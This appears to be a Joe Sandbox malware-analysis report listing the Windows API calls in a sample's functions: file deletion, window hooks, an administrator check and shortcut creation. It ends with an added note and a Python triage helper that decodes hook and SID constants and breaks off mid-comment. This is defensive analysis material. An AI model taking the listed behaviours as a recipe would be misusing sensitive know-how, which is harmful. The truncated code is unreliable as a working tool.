                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                    • Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
                                                                    • Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                    • Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                    • Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
                                                                    • Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                    • Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669
                                                                    APIs
                                                                    • SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: FileTime
                                                                    • String ID:
                                                                    • API String ID: 1425588814-0
                                                                    • Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                    • Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
                                                                    • Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                    • Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID:
                                                                    • API String ID: 1033339047-0
                                                                    • Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                    • Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
                                                                    • Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                    • Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID:
                                                                    • API String ID: 1033339047-0
                                                                    • Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                    • Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
                                                                    • Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                    • Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D
                                                                    APIs
                                                                    • CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    • Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                    • Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
                                                                    • Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                    • Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98
                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                    • Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
                                                                    • Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                    • Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509
                                                                    APIs
                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                    • Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
                                                                    • Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                    • Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09
                                                                    APIs
                                                                    • _wtol.MSVCRT ref: 00403882
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,00419828,00000000,0041981C), ref: 00403925
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
                                                                    • _wtol.MSVCRT ref: 00403A1C
                                                                    • CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                    • String ID: .lnk
                                                                    • API String ID: 408529070-24824748
                                                                    • Opcode ID: 1948e0700340f48ec15fd9fe2690368c0dd61efe9497a1a1bad70624b13cca41
                                                                    • Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
                                                                    • Opcode Fuzzy Hash: 1948e0700340f48ec15fd9fe2690368c0dd61efe9497a1a1bad70624b13cca41
                                                                    • Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                    • wsprintfW.USER32 ref: 004021E7
                                                                    • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                    • GetLastError.KERNEL32 ref: 00402201
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                    • GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                    • GetLastError.KERNEL32 ref: 00402236
                                                                    • lstrcmpiW.KERNEL32(00928E78,00404926), ref: 0040224B
                                                                    • ??3@YAXPAX@Z.MSVCRT(00928E78), ref: 0040225B
                                                                    • ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                    • SetLastError.KERNEL32(?), ref: 00402282
                                                                    • lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                    • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                    • _wtol.MSVCRT ref: 00402314
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,00928E78,00000002), ref: 00402334
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                    • String ID: 7zSfxString%d
                                                                    • API String ID: 2117570002-3906403175
                                                                    • Opcode ID: eb80ecc119c928046d4f48b44d1c37ea9d549868a3ac961d5216fb6842945394
                                                                    • Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
                                                                    • Opcode Fuzzy Hash: eb80ecc119c928046d4f48b44d1c37ea9d549868a3ac961d5216fb6842945394
                                                                    • Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                    • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                    • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                    • LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                    • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00401E60
                                                                    • wsprintfW.USER32 ref: 00401E7F
                                                                    • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00401E97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                    • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                    • API String ID: 2639302590-365843014
                                                                    • Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                    • Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
                                                                    • Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                    • Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8
                                                                    APIs
                                                                    • wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                    • GetLastError.KERNEL32 ref: 00408DF4
                                                                    • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                    • lstrlenW.KERNEL32(?), ref: 00408E44
                                                                    • lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                    • lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                    • LocalFree.KERNEL32(?), ref: 00408E9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                    • String ID:
                                                                    • API String ID: 829399097-0
                                                                    • Opcode ID: 70cd8bc1ebd143203d5f1bc79ab162f2f6f4eb1175f08b3b1613c25f11187359
                                                                    • Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
                                                                    • Opcode Fuzzy Hash: 70cd8bc1ebd143203d5f1bc79ab162f2f6f4eb1175f08b3b1613c25f11187359
                                                                    • Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
                                                                    • lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
                                                                    • lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
                                                                    • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
                                                                    • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                    • String ID:
                                                                    • API String ID: 1862581289-0
                                                                    • Opcode ID: 839cb6fd099afb1d89a388e6f192fb9bcf45602aedd80242c8a3aefe3316d1c0
                                                                    • Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
                                                                    • Opcode Fuzzy Hash: 839cb6fd099afb1d89a388e6f192fb9bcf45602aedd80242c8a3aefe3316d1c0
                                                                    • Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0040864F
                                                                    • SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408669
                                                                    • SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
                                                                    • EndDialog.USER32(?,00000000), ref: 0040869A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentHookThreadWindows$Dialog
                                                                    • String ID:
                                                                    • API String ID: 1967849563-0
                                                                    • Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                    • Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
                                                                    • Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                    • Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C
                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
                                                                    • FreeSid.ADVAPI32(?), ref: 004024A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    • Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                    • Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
                                                                    • Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                    • Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69
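The two function listings above (the dialog procedure that calls SetWindowsHookExW twice, and the AllocateAndInitializeSid / CheckTokenMembership / FreeSid triple) print their arguments as raw hex, which is where triage mistakes happen: hook type 7 is WH_MOUSE and 2 is WH_KEYBOARD, both installable for a single thread, whereas a keylogger-style hook is WH_KEYBOARD_LL (13), which is always system-wide; the sub-authorities 0x20 and 0x220 are SECURITY_BUILTIN_DOMAIN_RID and DOMAIN_ALIAS_RID_ADMINS, so the SID is S-1-5-32-544 and the call sequence is the standard "is the caller an administrator" check. The helper below is an added example, not part of the Joe Sandbox report or product: it parses the report's "APIs" line format, decodes those constants and prints one finding per call. The sample lines are copied from the two listings above; the SID identifier authority is not recoverable from the listing (only a pointer is shown), so treating it as SECURITY_NT_AUTHORITY is an assumption, and the "thread-scoped" verdict is an inference from the preceding GetCurrentThreadId call, not something the listing states.

```python
# Added triage helper (not part of the Joe Sandbox report): decode the raw
# Win32 constants in the per-function "APIs" listings shown above.
import re
from dataclasses import dataclass
from typing import List, Union

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Union[int, str]]
    ref: int

# Constructed input: lines copied from the report's "APIs" sections above
# (the hook-installing dialog function and the admin-group check).
REPORT_LINES = """
• GetCurrentThreadId.KERNEL32 ref: 0040864F
• SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
• GetCurrentThreadId.KERNEL32 ref: 00408669
• SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
• EndDialog.USER32(?,00000000), ref: 0040869A
• AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
• FreeSid.ADVAPI32(?), ref: 004024A2
"""

# One "• Name.MODULE(args), ref: ADDR" line; the argument list is optional
# because calls such as "_wtol.MSVCRT ref: ..." are printed without one.
API_RE = re.compile(r"•\s*(?P<name>[^.\s(]+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")

# Documented WH_* identifiers (winuser.h).  Only the two _LL types are
# system-wide by construction; the others can be installed per thread.
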